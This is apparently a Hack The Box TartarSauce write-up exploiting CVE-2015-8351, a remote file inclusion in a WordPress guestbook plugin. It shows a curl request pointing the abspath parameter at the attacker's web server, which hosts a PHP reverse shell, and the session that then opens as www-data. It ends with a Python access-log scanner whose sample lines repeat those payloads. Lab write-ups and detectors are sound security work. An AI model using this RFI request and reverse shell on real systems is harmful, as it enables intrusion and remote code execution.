CVE-2015-8351


According to the text file, the abspath parameter of ajaxresponse.php does not properly sanitize user input, resulting in RFI (Remote File Inclusion): the script includes a file named wp-load.php from whatever location the parameter names, including an arbitrary remote server. This means that I can host a malicious PHP file named wp-load.php and have the target fetch and execute it via the require() function by sending a GET request to the respective URL.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ simplehttp .   
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Hosting the payload over HTTP on Kali

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nnc 9999             
listening on [any] 9999 ...

Netcat listener is also set

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ curl 'http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.10:8000/'

Sending it via curl. The target web app will use the require() function to look for the wp-load.php file in whatever directory is put in the abspath parameter. In this case, it's the Kali web server, hosting the malicious (PHP reverse shell) wp-load.php.

As expected, the local web server running on Kali logs the payload being fetched by the target web server.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nnc 9999             
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.88] 45910
SOCKET: Shell has connected! PID: 3957
whoami
www-data
hostname
TartarSauce
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1290083 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1284690 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:276979062 (276.9 MB)  TX bytes:604503882 (604.5 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:16152 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16152 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1201888 (1.2 MB)  TX bytes:1201888 (1.2 MB)

Initial foothold established on the target system as www-data by exploiting CVE-2015-8351 in the target web application.
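From the defensive side, the request shape used above (ajaxresponse.php with an abspath value that is a URL rather than the WordPress root) is easy to spot in the web server's access log. The following Python script is an added example, not part of this writeup or of the plugin; it parses Combined Log Format lines (constructed sample data below) and flags abspath values that carry a scheme (remote include or PHP stream wrapper) or directory traversal.

```python
# Added example: flag access-log requests that match the CVE-2015-8351 pattern,
# i.e. the Gwolle Guestbook ajaxresponse.php endpoint called with an abspath
# value that is not a plain local directory path.
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "gwolle-gb/frontend/captcha/ajaxresponse.php"


def classify_abspath(value: str) -> str:
    """'remote' for URL or stream-wrapper values (http://, php://, data:...),
    'traversal' for dot-dot or backslash tricks, otherwise 'local'."""
    if re.match(r"[a-z][a-z0-9+.\-]*:", value, re.IGNORECASE):
        return "remote"
    if ".." in re.split(r"[\\/]", value) or "\\" in value:
        return "traversal"
    return "local"


def find_rfi_attempts(log_lines):
    """Return (client, timestamp, abspath, verdict) for each flagged request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes, so %3A%2F%2F-style encoding does not hide a URL
        for value in parse_qs(url.query, keep_blank_values=True).get("abspath", []):
            verdict = classify_abspath(value)
            if verdict != "local":
                hits.append((m["src"], m["ts"], value, verdict))
    return hits


# Constructed sample log lines (hypothetical timestamps); the endpoint path and
# the attacker/target addresses mirror the writeup above.
_EP = "/webservices/wp/wp-content/plugins/" + ENDPOINT
SAMPLE_LOG = [
    f'10.10.14.10 - - [01/Jan/2024:12:00:01 +0000] "GET {_EP}?abspath=http://10.10.14.10:8000/ HTTP/1.1" 200 512',
    f'10.10.14.10 - - [01/Jan/2024:12:00:02 +0000] "GET {_EP}?abspath=../../../../../tmp/ HTTP/1.1" 500 0',
    f'10.10.14.11 - - [01/Jan/2024:12:00:03 +0000] "GET {_EP}?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 40',
    '10.10.14.12 - - [01/Jan/2024:12:00:04 +0000] "GET /webservices/wp/ HTTP/1.1" 200 1234',
    f'10.10.14.10 - - [01/Jan/2024:12:00:05 +0000] "GET {_EP}?abspath=http%3A%2F%2F10.10.14.10%3A8000%2F HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(*hit)
```

Only the three requests with a remote or traversing abspath are reported; the legitimate call that passes the local WordPress directory is left alone.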